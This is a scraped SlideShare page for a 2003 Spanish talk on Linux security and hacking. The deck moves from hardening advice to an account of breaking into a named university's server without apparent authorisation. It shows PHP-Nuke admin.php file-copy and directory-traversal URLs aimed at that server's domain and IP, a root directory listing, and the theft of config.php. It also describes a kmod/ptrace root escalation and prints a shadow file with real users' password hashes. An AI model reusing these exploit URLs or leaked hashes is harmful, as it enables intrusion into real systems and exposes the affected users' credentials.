SlideShare una empresa de Scribd logo
1 de 40
Descargar para leer sin conexión
SEGURIDAD Y
HACKING
EN LINUX
Alonso Eduardo Caballero Quezada - ReYDeS -
RareGaZz Security Team http://www.RareGaZz.org
Security Wari Projetcs http://www.SWP-zone.org
informatizate http://www.informatizate.net
Miércoles 9 de Julio del 2003
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad
2. Seguridad en GNU/Linux
3. Hacking en Linux. (U.N.T)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Seguridad en GNU/Linux
Seguridad:
Seguridad es la característica de un
sistema informático, que indica que
ese sistema está libre de todo
peligro.
“La seguridad es un estado mental”
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Que proteger?
. SoftWare
. HardWare
. Datos
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
De quien nos protegemos?
- Personas:
. Personal de la empresa
. Ex-empleados
. Curiosos
. Hackers
. Crackers
. Terroristas (*)
. Intrusos Remunerados
- Desastres Naturales:
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
- Amenazas Logicas:
. Software incorrecto
. Herramientas de seguridad
. Puertas traseras (Backdoor)
. Bombas Logicas
. Canales cubiertos
. Virus
. Gusanos
. Caballos de Troya
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD EN LINUX
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
1. Definición de los
servicios necesarios.
. Servidor Web (Apache)
. Servidor de Correo
(Sendmail)
. Servidor SSH, FTP, DNS
etc.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
2. Utilizar Herramientas
de Bastionado.
(BASTILLE ó TITAN)
. Educa al administrador
sobre potenciales problemas
de seguridad en el sistema.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
3. Utilizar un Antivirus
basado en Software Libre.
(AmaViS)
. Indicado cuando hay
interacción entre Linux u
otro sistema Operativo.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
4. Utilización de un PROXY
(SQUID).
. Un punto de acceso entre
una intranet y una
internet.
. Control de los datos.
(squidGuard)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
5. Instalación y configuración
de un Firewall.
(IPTABLES).
. Un punto estratégico de
vigilancia del sistema.
. Creación de reglas para las
conecciones y servicios.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
6. Detección de Instrusos
basados en HOST.
(Tripwire)
. Comprobar la integridad
de los archivos en el
sistema.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
7. Sistema Detector de Intrusos
(IDS)
. Vigilancia del Servidor.
. Detección de actividad
sospechosa.
. Respuesta mediata e inmediata
. Uso de (ACID) Consola de D.I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
8. Administrador
. Persona adecuada.
. Experiencia. (*)
. Actualización constante.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
HACKING EN LINUX
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
ADVERTENCIA:
El artículo completo y detallado de lo expuesto
a continuación sera publicado en la eZine
RareGaZz Número 20. http://www.RareGaZz.org
Todo esta información se expone solo con fines
didacticos y de conocimiento. De ninguna
manera el autor o el Grupo RareGaZz induce a
realizar este tipo de acciones.
ReYDeS / RareGaZz Security Team
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Institución:
Universidad Nacional de Trujillo
URL:
http://www.unitru.edu.pe
Tiempo Total:
2 horas.
Objetivo:
Auditoria Personal y Libre de la Seguridad del
servidor de la Universidad Nacional de Trujillo
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Primer Punto:
Obtener todo la informacion posible del
sistema.
- Tools
. NMAP (www.insecure.org/nmap)
. NIKTO (http://www.cirt.net/code/nikto.shtml)
. NetCat
. Comandos propios de Linux, desde un simple
ping a un dig por ejemplo.
- Software De Auditoria:
. NESSUS (http://www.nessus.org)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
NMAP
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Nessus
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Sistemas Vulnerables: PHP­Nuke 5.2 y anteriores
Sistemas Inmunes: PHP­Nuke 5.0 RC1
Exploit: 
Probando el formato de la siguiente URL:
http://www.example.net/admin.php?upload=1 &file=config.php&
file_name=hacked.txt&wdir=/images/&userfile=config.php &
userfile_name=hacked.txt
Mediante la anterior peticion de la anterior URL se podría
observer leer en “config.php”. El cual contiene las claves de la
Base de Datos. Con todas las posibles consecuencias que ello
acarrea.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
PHP NUKE EXPLOIT
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Lo anterior, permite automatizar el test sobre
la falla en “admin.php”
La URL que se analiza es la siguiente:
http://www.unitru.edu.pe/admin.php?upload=1
&file=config.php&file_name=hacked.txt&wdir=/images/
&userfile=config.php&userfile_name=hacked.txt
Con esto se copia “hacked.txt” al directorio
“images”. Pero nos lleva al menu administración
con el siguiente error:
Warning: Unable to create '/www/htdocs/images/hacked.txt’
: Permission denied in /www/htdocs/admin.php on line 400
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Ahora la siguiente URL, nos permite listar
cualquier directorio de la web. En éste caso
“/images/admin/”
http://www.unitru.edu.pe/admin.php?upload=1
&wdir=/images/admin/
Solo directorios de la WEB?... NO!
http://200.60.44.6/admin.php?upload=1&wdir=/../../../
La Raiz del sistema (Formato texto)
bin bin 4k 22-03-2001 18:56:22
boot boot 1k 23-03-2001 07:20:08
etc etc 4k 12-03-2003 09:04:18
root root 4k 22-02-2003 10:25:13
...
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Se puede listar cualquier directorio y ver
archivos, pero solo con permisos de nobody.
Que se necesita para elevar privilegios?.
. Acceso de escritura a un directorio.
. Copiar el config.php. Archivo de la
configuración del phpnuke.
. Obtener mas información del sistema. Pero
ahora desde dentro, por ejemplo Software
instalado, versiones, actualizaciones,
conecciones, etc.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
. Problema: Tenemos el directorio /tmp/ para
escritura, pero no podemos visualizar el
archivo. Ya que estamos trabajando vía web.
. Solución: Encontramos el programa YaBB
http://aries.unitru.edu.pe/foro/install.php
. Se tiene derechos de escritura en /foro/ y
podemos visualizarlo vía web. Con lo cual:
http://200.60.44.6/admin.php?upload=1&file=config.php
&file_name=p.txt&wdir=/foro/&userfile=config.php
&userfile_name=p.txt
[DIR] Parent Directory 24-Feb-2003 23:47 -
[ ] install.php 18-Feb-2003 03:08 18k
[TXT] p.txt 18-Mar-2003 01:11 11k
[ ] yse150.ya 18-Feb-2003 03:09 1.8M
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
PHP Nuke xploit: Permite subir archivos al
sistema.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Con la ayuda de PHP-Nuke exploit para subir
archivos y el PHP Shell para ejecutar comandos
ya se tiene un mejor control sobte el sistema.
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
. En /foro/:
. Subir cmd.html, rs.php Y en nuestro localhost
utilizamos el phpnuker.html.
Problema: Obtener privilegios ROOT.
Solución: Ejecutar un exploit para “explotar”
una falla en el sistema. Por ejemplo. Versión
del Kernel?
uname -a
Linux aries 2.4.2 #2 Fri Mar 23 06:53:47 PET 2001 i686
unknown
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Linux kmod/ptrace bug:
Cuando un proceso hace una petición a una
caracteristica que esta en un modulo. En kernel
crea un proceso hijo setea los permisos EUID
GUID a 0 y llama a la funcion execve
(“/sbin/mdprobe”)
El problema es que antes de que el EUID cambie
el proceso hijo puede ser añadido con ptrace. De
ésta manera el usuario puede insertar codigo
dentro del proceso lo cual se ejecutará con
privilegios de superusuario (ROOT).
Ejemplo: ->
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
root:$1$1j/xKdpw$KMm/nMEBb3tZkpj42oiL9/:11913:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
gdm:*:9797:0:::::
nobody:*:9797:0:::::
dwong:$1$3NZyPSF2$2VO7nReTKGN5Y9PftBX1j/:12122:0:99999:7:::
mysql:$1$2DIuivNW$5/35UzOTWcOdaPvqRFcuX.:11404:0:99999:7:::
webmaster:$1$qcRvrUzR$U9Y5LepV0STQewAdD6FkA/:11624:0:99999:7:::
toor:$1$12/Juu6R$riwwt6ZQcX4fKyynY3eZq1:11438:0:99999:7:::
jchong:$1$DE/x6fuY$OWWC0qFyQMm7d9XdbG5f1/:11871:0:99999:7:::
kayluss:$1$dWpxKneU$plRq15DL8/qtO9Z8414yW0:11914:0:99999:7:::
eponte:$1$0hXuyKVe$Qxbdcg/erYBLpPkHNodC0.:12107:0:99999:7:::
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Gracias por su atención
[root@camaratru root]# shutdown -r now
e-mail: ReYDeS@bigfoot.com
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Agradecimientos:
Mi Madre, mi hermana, mi sobrino y Padre.
Angel Protector, alt3kx, Buanzo, PaTa, ocsic, Shadown,
enan0, v1k1ng0, MaGics, Yo_soy, runl3v3l, xDAWN, Rebel,
Neoy2k, RareTrip, GuyBrush, y0ni, y a todos los que
alguna vez participaron en RareGaZz Security Team.
A sicario, incompatible, xyz4a3, Sudmaster, y a
todo los amigos de Security Wari Projects.
A todos mis amigos virtuales del “Underground”.
A Miguel, David, Deus, Francisco, Victor, Robert y Juan
Manuel, del grupo informatizate.
A Arturo, Alejandro, Javier, Juan, miembros de ICIAT.
A todos mis amigos “reales”.
A Juditsa, Claudia, Paola, Betsy, Cecilia, Carol,
Miluska, Marilyn, Patricia, Silvana, Sara, Angela, Leily,
Maribel, Cynthia, Elizabeth, Milagros, Erika, Jhenice,
Nathaly, etc, etc. En especial a mi:
Futura Esposa.
(Donde quiera que este)
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
Problemas de identidad
    * Me he olvidado el pasword....
    * Me he olvidado mi login....
    * ( variante de la anterior ) Es que no sé quien soy....
    * Es que soy tonto, y necesito que me lo hagan....
    * ¿Cuál es mi "dolarjome"? 
Aspirantes a hacker
    * ¿Qué tengo que hacer para entrar de root?
    * ¿Cómo puedo saltarme el firewall?
    * Oye, no me deja cambiar la configuración de las X...
    * Es que quiero poner un sniffer, y necesito entrar de root...
    * Qué hay que hacer en el firewall para que funcione la VozIP?
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I
SEGURIDAD Y HACKING EN LINUX / Alonso Caballero / INFOTECH I

Más contenido relacionado

La actualidad más candente

Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13peter69
 
Seguridad Entornos Web Open Source
Seguridad Entornos Web Open SourceSeguridad Entornos Web Open Source
Seguridad Entornos Web Open SourceVictor M. Fernández
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSPaloSanto Solutions
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Francisco Medina
 
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...RootedCON
 
Navegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxNavegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxFrancisco Medina
 
Como proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoComo proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoPedro Santos
 
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/Linux
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/LinuxActividad No. 11: Reporte forense sobre intrusión a servidor GNU/Linux
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/LinuxFrancisco Medina
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidadeslamugre
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandboxTensor
 
Actividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkActividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkFrancisco Medina
 
Webinar Gratuito: Kali Linux 2.0
Webinar Gratuito: Kali Linux 2.0Webinar Gratuito: Kali Linux 2.0
Webinar Gratuito: Kali Linux 2.0Alonso Caballero
 

La actualidad más candente (18)

Seguridad en Windows Mobile
Seguridad en Windows MobileSeguridad en Windows Mobile
Seguridad en Windows Mobile
 
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
Taller Kali Linux3: Rastreando Informacion y Objetivos -HackMadrid ene13
 
Kali linux v2_re_y_des
Kali linux v2_re_y_desKali linux v2_re_y_des
Kali linux v2_re_y_des
 
Seguridad Entornos Web Open Source
Seguridad Entornos Web Open SourceSeguridad Entornos Web Open Source
Seguridad Entornos Web Open Source
 
Kali linux
Kali linuxKali linux
Kali linux
 
Seguridad en Open Solaris
Seguridad en Open SolarisSeguridad en Open Solaris
Seguridad en Open Solaris
 
Extendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPSExtendiendo la seguridad en Elastix con Snort IDS/IPS
Extendiendo la seguridad en Elastix con Snort IDS/IPS
 
El sendero-del-hacker
El sendero-del-hackerEl sendero-del-hacker
El sendero-del-hacker
 
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
Actividad No. 1.15 Autenticación de dos factores con Google Authenticator en...
 
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...
Jose Luis Verdeguer & Víctor Seva – Secure Communications System [Rooted CON ...
 
Navegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linuxNavegación web anónima con tor y privoxy en kali linux
Navegación web anónima con tor y privoxy en kali linux
 
Como proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en brutoComo proteger nuestro WordPress de ataques de fuerza en bruto
Como proteger nuestro WordPress de ataques de fuerza en bruto
 
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/Linux
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/LinuxActividad No. 11: Reporte forense sobre intrusión a servidor GNU/Linux
Actividad No. 11: Reporte forense sobre intrusión a servidor GNU/Linux
 
Ataques Y Vulnerabilidades
Ataques Y VulnerabilidadesAtaques Y Vulnerabilidades
Ataques Y Vulnerabilidades
 
Práctica 3.4 NAT
Práctica 3.4 NATPráctica 3.4 NAT
Práctica 3.4 NAT
 
Cuckoo sandbox
Cuckoo sandboxCuckoo sandbox
Cuckoo sandbox
 
Actividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA frameworkActividad No. 6 Configuración de un access point con MANA framework
Actividad No. 6 Configuración de un access point con MANA framework
 
Webinar Gratuito: Kali Linux 2.0
Webinar Gratuito: Kali Linux 2.0Webinar Gratuito: Kali Linux 2.0
Webinar Gratuito: Kali Linux 2.0
 

Destacado

Presentacion seguridad en_linux
Presentacion seguridad en_linuxPresentacion seguridad en_linux
Presentacion seguridad en_linuxNbsecurity
 
Webinar Gratuito: "Informática Forense y GNU/Linux"
Webinar Gratuito: "Informática Forense y GNU/Linux"Webinar Gratuito: "Informática Forense y GNU/Linux"
Webinar Gratuito: "Informática Forense y GNU/Linux"Alonso Caballero
 
3.2 Revision de Seguridad Linux con Bastille
3.2 Revision de Seguridad Linux con Bastille3.2 Revision de Seguridad Linux con Bastille
3.2 Revision de Seguridad Linux con BastilleMeztli Valeriano Orozco
 
Exposicion seguridad en linux
Exposicion  seguridad en linuxExposicion  seguridad en linux
Exposicion seguridad en linuxJHON MALDONADO
 
Capital intelectual skandia
Capital intelectual skandiaCapital intelectual skandia
Capital intelectual skandiaescolastik9
 
Plan naUTE del Proceso de construcción del Plan nacional del buen vivir
Plan naUTE del Proceso de construcción del Plan nacional del buen vivirPlan naUTE del Proceso de construcción del Plan nacional del buen vivir
Plan naUTE del Proceso de construcción del Plan nacional del buen vivirMaria Ostaiza
 
Violencia escolar katy adana
Violencia   escolar katy adanaViolencia   escolar katy adana
Violencia escolar katy adanaGriselda Vissani
 
Gerencia industrial1
Gerencia industrial1Gerencia industrial1
Gerencia industrial1AdaLugo14
 
UTE-El emprendimiento social como marco de analisis
UTE-El emprendimiento  social como marco de analisisUTE-El emprendimiento  social como marco de analisis
UTE-El emprendimiento social como marco de analisisMaria Ostaiza
 
Baixo Sul mostra que Paulo Souto realiza pra valer
Baixo Sul mostra que Paulo Souto realiza pra valerBaixo Sul mostra que Paulo Souto realiza pra valer
Baixo Sul mostra que Paulo Souto realiza pra valerPaulo Souto 25
 
Ecología y conservación
Ecología y conservaciónEcología y conservación
Ecología y conservaciónSylvich
 
Umb presentacion act. 3 fund. administracion
Umb presentacion act. 3 fund. administracionUmb presentacion act. 3 fund. administracion
Umb presentacion act. 3 fund. administracionefrain09
 
Sumário executivo - perfil do aprovado - anafic
Sumário executivo - perfil do aprovado - anaficSumário executivo - perfil do aprovado - anafic
Sumário executivo - perfil do aprovado - anaficWallace Sousa
 
Pedagogia Espírita
Pedagogia EspíritaPedagogia Espírita
Pedagogia EspíritaCeadsbcn
 

Destacado (20)

Presentacion seguridad en_linux
Presentacion seguridad en_linuxPresentacion seguridad en_linux
Presentacion seguridad en_linux
 
Practica No. 3 Bastille
Practica No. 3 BastillePractica No. 3 Bastille
Practica No. 3 Bastille
 
Webinar Gratuito: "Informática Forense y GNU/Linux"
Webinar Gratuito: "Informática Forense y GNU/Linux"Webinar Gratuito: "Informática Forense y GNU/Linux"
Webinar Gratuito: "Informática Forense y GNU/Linux"
 
Configuracion de bastille
Configuracion de bastilleConfiguracion de bastille
Configuracion de bastille
 
3.2 Revision de Seguridad Linux con Bastille
3.2 Revision de Seguridad Linux con Bastille3.2 Revision de Seguridad Linux con Bastille
3.2 Revision de Seguridad Linux con Bastille
 
Exposicion seguridad en linux
Exposicion  seguridad en linuxExposicion  seguridad en linux
Exposicion seguridad en linux
 
Capital intelectual skandia
Capital intelectual skandiaCapital intelectual skandia
Capital intelectual skandia
 
Laia carmona
Laia carmonaLaia carmona
Laia carmona
 
Plan naUTE del Proceso de construcción del Plan nacional del buen vivir
Plan naUTE del Proceso de construcción del Plan nacional del buen vivirPlan naUTE del Proceso de construcción del Plan nacional del buen vivir
Plan naUTE del Proceso de construcción del Plan nacional del buen vivir
 
El problema
El problemaEl problema
El problema
 
Violencia escolar katy adana
Violencia   escolar katy adanaViolencia   escolar katy adana
Violencia escolar katy adana
 
Gerencia industrial1
Gerencia industrial1Gerencia industrial1
Gerencia industrial1
 
UTE-El emprendimiento social como marco de analisis
UTE-El emprendimiento  social como marco de analisisUTE-El emprendimiento  social como marco de analisis
UTE-El emprendimiento social como marco de analisis
 
Baixo Sul mostra que Paulo Souto realiza pra valer
Baixo Sul mostra que Paulo Souto realiza pra valerBaixo Sul mostra que Paulo Souto realiza pra valer
Baixo Sul mostra que Paulo Souto realiza pra valer
 
Limitaciones de las tic
Limitaciones de las ticLimitaciones de las tic
Limitaciones de las tic
 
Ecología y conservación
Ecología y conservaciónEcología y conservación
Ecología y conservación
 
Umb presentacion act. 3 fund. administracion
Umb presentacion act. 3 fund. administracionUmb presentacion act. 3 fund. administracion
Umb presentacion act. 3 fund. administracion
 
Herramientas telematicas
Herramientas telematicasHerramientas telematicas
Herramientas telematicas
 
Sumário executivo - perfil do aprovado - anafic
Sumário executivo - perfil do aprovado - anaficSumário executivo - perfil do aprovado - anafic
Sumário executivo - perfil do aprovado - anafic
 
Pedagogia Espírita
Pedagogia EspíritaPedagogia Espírita
Pedagogia Espírita
 

Similar a Presentacion re y_des_09072003

Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortFrancisco Medina
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortJuan Oliva
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica estefasanchez
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática estefasanchez
 
Webinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a LinuxWebinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a LinuxAlonso Caballero
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasArturo Hoffstadt
 
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Francisco Medina
 
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPJuan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPElastixCom
 
Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Alonso Caballero
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bisFrancesc Perez
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informaticawalteraguero
 

Similar a Presentacion re y_des_09072003 (20)

Actividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con SnortActividad No. 6.6: Detección de intrusos con Snort
Actividad No. 6.6: Detección de intrusos con Snort
 
Informe linux
Informe linuxInforme linux
Informe linux
 
Extendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con SnortExtendiendo la Seguridad de Elastix con Snort
Extendiendo la Seguridad de Elastix con Snort
 
Seguridad informatica
Seguridad informatica Seguridad informatica
Seguridad informatica
 
Seguridad informática
Seguridad informática Seguridad informática
Seguridad informática
 
Webinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a LinuxWebinar Gratuito: Analisis Forense a Linux
Webinar Gratuito: Analisis Forense a Linux
 
Seguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de SistemasSeguridad Computacional y Administración de Sistemas
Seguridad Computacional y Administración de Sistemas
 
Sr8 cm3 eq2-sistema operativo unix
Sr8 cm3 eq2-sistema operativo unixSr8 cm3 eq2-sistema operativo unix
Sr8 cm3 eq2-sistema operativo unix
 
Seguridad en linux
Seguridad en linuxSeguridad en linux
Seguridad en linux
 
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
Actividad No. 1.14: Protección del servidor MySQL mediante filtrado de paquetes
 
Present3
Present3Present3
Present3
 
Tarea migue[1]
Tarea migue[1]Tarea migue[1]
Tarea migue[1]
 
NcN_CSUC_CSIRT
NcN_CSUC_CSIRTNcN_CSUC_CSIRT
NcN_CSUC_CSIRT
 
CERT/CSIRT's tools: Con las manos en la masa
CERT/CSIRT's tools: Con las manos en la masaCERT/CSIRT's tools: Con las manos en la masa
CERT/CSIRT's tools: Con las manos en la masa
 
Sistema linux
Sistema linuxSistema linux
Sistema linux
 
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIPJuan Oliva - Seguridad Preventiva y Reactiva en VoIP
Juan Oliva - Seguridad Preventiva y Reactiva en VoIP
 
Test de intrusion
Test de intrusionTest de intrusion
Test de intrusion
 
Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"Webinar Gratuito "Informática Forense & Linux"
Webinar Gratuito "Informática Forense & Linux"
 
Seguridad: Backtrack1_bis
Seguridad: Backtrack1_bisSeguridad: Backtrack1_bis
Seguridad: Backtrack1_bis
 
Seguridad informatica
Seguridad informaticaSeguridad informatica
Seguridad informatica
 

Más de Alonso Caballero

Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoAlonso Caballero
 
Curso Virtual Fundamentos de Hacking Web
Curso Virtual Fundamentos de Hacking WebCurso Virtual Fundamentos de Hacking Web
Curso Virtual Fundamentos de Hacking WebAlonso Caballero
 
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking Web
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking WebWebinar Gratuito: Escaneos con Scripts de Nmap para Hacking Web
Webinar Gratuito: Escaneos con Scripts de Nmap para Hacking WebAlonso Caballero
 
Curso Virtual Fundamentos de Hacking Ético
Curso Virtual Fundamentos de Hacking ÉticoCurso Virtual Fundamentos de Hacking Ético
Curso Virtual Fundamentos de Hacking ÉticoAlonso Caballero
 
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"
Webinar Gratuito: "Técnicas para Escaneo de Puertos con Nmap"Alonso Caballero
 
Curso Virtual Hacking con Kali Linux
Curso Virtual Hacking con Kali LinuxCurso Virtual Hacking con Kali Linux
Curso Virtual Hacking con Kali LinuxAlonso Caballero
 
Webinar Gratuito: "Zenmap para Pentesting"
Webinar Gratuito: "Zenmap para Pentesting"Webinar Gratuito: "Zenmap para Pentesting"
Webinar Gratuito: "Zenmap para Pentesting"Alonso Caballero
 
Curso Virtual Informática Forense
Curso Virtual Informática ForenseCurso Virtual Informática Forense
Curso Virtual Informática ForenseAlonso Caballero
 
Webinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con AutopsyWebinar Gratuito: Análisis de Memoria con Autopsy
Webinar Gratuito: Análisis de Memoria con AutopsyAlonso Caballero
 
Curso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebCurso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebAlonso Caballero
 
Webinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosWebinar Gratuito: Inyección de Comandos
Webinar Gratuito: Inyección de ComandosAlonso Caballero
 
Curso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoCurso Virtual de Hacking Ético
Curso Virtual de Hacking ÉticoAlonso Caballero
 
Webinar Gratuito: Nessus Essentials
Webinar Gratuito: Nessus EssentialsWebinar Gratuito: Nessus Essentials
Webinar Gratuito: Nessus EssentialsAlonso Caballero
 
Curso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebCurso Virtual de Hacking Aplicaciones Web
Curso Virtual de Hacking Aplicaciones WebAlonso Caballero
 
Vulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebVulnerabilidades en Aplicaciones Web
Vulnerabilidades en Aplicaciones WebAlonso Caballero
 
Curso Virtual Bug Bounty 2022
Curso Virtual Bug Bounty 2022Curso Virtual Bug Bounty 2022
Curso Virtual Bug Bounty 2022Alonso Caballero
 
Curso Virtual Análisis de Malware 2022
